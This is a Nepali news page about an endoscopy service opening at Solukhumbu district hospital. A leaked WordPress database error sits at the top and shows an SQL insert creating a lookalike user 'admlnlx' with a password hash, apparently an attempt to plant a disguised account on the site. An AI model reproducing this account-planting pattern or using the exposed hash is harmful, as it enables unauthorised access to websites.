WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.lgVmjELLWb7Rbm3O4H1FCH51S2WY1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 23:52:54', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सोलुखुम्बुको जिल्ला अस्पतालमा इन्डोस्कोपी सेवा शुरु गरिएको छ ।
जिल्ला समन्वय समितिका प्रमुख तथा सोलु जिल्ला अस्पताल व्यवस्थापन समितिका अध्यक्ष कृष्ण प्रसाद निरौलाले एक कार्यक्रमका बिच बिहीबार इन्डोस्कोपी सेवाको उद्घाटन गरेका हुन् ।
इन्डोस्कोपी सेवालाई निरन्तरता दिन र अस्पतालको सेवालाई प्रभावकारी बनाउने आर्थिक पक्ष सबल हुनुपर्ने हुदा आफू लागि पर्ने तथा अस्पतालमा डाक्टर नियमित रुपमा राख्नका लागि पनि पहल गर्ने जिसस प्रमुख निरौलाले बताए ।
डा। मिङमार ग्याल्जेन शेर्पाले इन्डोस्कोपी सेवाका लागि जिल्लाका नागरिक बाहिरी जिल्लामा उपचारका लागि जानुपर्ने बाध्यता अन्त्यका लागि यसले सहयोग पुग्ने विश्वास व्यक्त गरे । प्रमुख जिल्ला अधिकारी अनिल खनालले जिल्लामा सञ्चालनमा आएको सेवालाई प्रभावकारी बनाउदै निरन्तरतामा ध्यान दिन आग्रह गरे ।
अस्पतालकी निमित्त कार्यलय प्रमुख सानी शेर्पाले जिल्लामै पहिलो पटक इन्डोस्कोपी सेवा सुरु भएको बताए ।